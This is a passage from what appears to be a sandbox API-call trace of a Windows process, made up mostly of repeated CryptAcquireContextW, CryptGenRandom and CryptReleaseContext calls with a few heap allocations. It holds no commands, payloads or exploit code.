dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.414] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.414] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.414] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.415] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.415] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.415] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.416] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.416] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.416] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2eac08 [0033.416] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2eac90 [0033.416] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2e6bf8 [0033.416] CryptAcquireContextW (in: phProv=0x2ad724, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad724*=0x2e6c80) returned 1 [0033.417] CryptGenRandom (in: hProv=0x2e6c80, dwLen=0x80, pbBuffer=0x2ad738 | out: pbBuffer=0x2ad738) returned 1 [0033.417] CryptReleaseContext (hProv=0x2e6c80, dwFlags=0x0) returned 1 [0033.417] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9640 [0033.420] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.421] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.421] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.421] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.422] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.422] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.422] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.422] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.422] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.423] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.423] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.423] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.424] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.424] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.424] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.424] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.425] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.425] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.425] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.426] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.426] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.426] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.427] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.427] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.427] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.427] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.427] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.427] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.428] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.428] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.428] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.429] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.429] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.429] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.429] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.430] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.430] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.430] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.430] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.430] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.431] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.431] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.431] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.432] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.432] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.432] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.433] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.433] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.433] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.433] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.433] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.433] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.434] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.434] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.434] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.435] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.435] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.435] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.436] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.436] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.436] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.436] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.437] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.437] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.437] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.437] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.437] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.438] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.438] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.438] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.439] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.439] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.439] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.439] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.439] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.440] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.440] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.440] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.441] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.441] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.441] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.441] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.442] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.442] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.442] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.443] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.443] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.443] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.444] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.444] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.444] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.444] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.444] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.444] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.445] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.445] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.445] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.446] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.446] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.446] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.447] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.447] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.447] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.447] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.447] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.447] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.448] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.448] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.448] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.449] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.449] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.449] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.450] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.450] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.450] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.451] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.451] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.451] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.451] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.451] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.451] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.452] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.452] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.452] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.453] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.453] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.453] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.453] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.453] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.454] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.454] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.454] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.454] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.455] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.455] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.455] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.456] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.456] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.456] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.456] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.456] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.457] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.457] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.457] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.457] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.458] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.458] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.458] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.459] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.459] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.459] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.460] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.460] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.460] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.460] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.460] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.461] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.461] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.461] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.462] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.462] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.462] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.462] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.463] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.463] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.463] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.464] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.464] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.464] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.464] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.464] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.465] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.465] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.465] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.465] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.466] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.466] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.466] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.467] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.467] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.467] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.467] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.467] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.468] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.468] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.468] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.468] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.469] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.469] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.469] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.470] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.470] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.470] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, 